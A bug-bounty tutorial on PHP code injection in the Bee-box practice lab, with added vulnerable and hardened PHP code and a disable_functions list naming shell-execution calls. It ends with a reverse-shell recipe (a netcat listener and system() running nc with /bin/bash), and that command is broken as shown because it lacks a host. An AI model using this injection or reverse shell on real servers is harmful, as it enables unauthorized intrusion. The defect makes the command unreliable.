Bug Bounty Hunting - PHP Code Injection

PHP Code Injection

PHP code injection is a vulnerability that allows an attacker to inject custom PHP code that is then executed by the server-side scripting engine.

Tools we will be using

  • Bee-box

Getting started

  • If we click on the message, it echoes data back, so we know the PHP code is executing correctly.
  • We can also see this in the URL, in the message parameter.
  • We can change the echoed message; however, if we try other data such as HTML tags (HTML injection), we get no output.
  • So we have established that the message is being processed by the server rather than being placed straight into the page.
  • If we insert a PHP statement terminator (a semicolon), we can run further PHP statements, such as the PHP system() call.
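To make clear what is going wrong on the server and what the fix looks like, here is an added example. It is my code, not bee-box's or bWAPP's source; it assumes the vulnerable page builds a PHP statement from the message query parameter and runs it with eval(), which is one way the behaviour in the steps above arises. The function names and the allow-list pattern are my own choices.

```php
<?php
// Added example (not bee-box's own source). Assumption: the page splices the
// "message" query parameter into PHP source and runs it with eval().

// VULNERABLE: user input becomes part of the PHP source that is executed.
// A ';' in the input ends the echo statement, and whatever follows it is
// run as PHP, which is exactly what the steps above observe.
function render_message_vulnerable(string $message): void
{
    eval('echo "' . $message . '";');
}

// HARDENED: the input is only ever treated as data, never as code.
// htmlspecialchars() also stops it from being interpreted as HTML,
// which closes the HTML injection case mentioned above at the same time.
function render_message_safe(string $message): string
{
    return htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Optional extra check: an allow-list for a short, human-readable message.
// Rejecting anything outside this set is a useful second layer, but it is
// not a substitute for removing eval(); the safe renderer above needs no
// such check to be correct.
function is_plain_message(string $message): bool
{
    return strlen($message) <= 200
        && preg_match('/^[A-Za-z0-9 .,!?\'-]*$/', $message) === 1;
}

// Take the parameter from $_GET only when it is present and is a string.
$message = isset($_GET['message']) && is_string($_GET['message'])
    ? $_GET['message']
    : 'no message';

if (!is_plain_message($message)) {
    http_response_code(400);
    $message = 'invalid message';
}

echo render_message_safe($message);
```

The root cause is eval() on attacker-controlled text, so the real fix is to delete the eval() path entirely; the allow-list and output encoding are defence in depth. As a further server-side layer, the php.ini directive disable_functions can list system, exec, shell_exec, passthru and popen so that even a surviving injection cannot reach the operating system through those calls.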

A common way of taking advantage of PHP code injection is through the system() call, which passes a string to the operating system shell.


Getting a reverse shell

Set up a netcat listener: nc -nvlp 1234

Execute nc through the system() call: system("nc 1234 -e /bin/bash");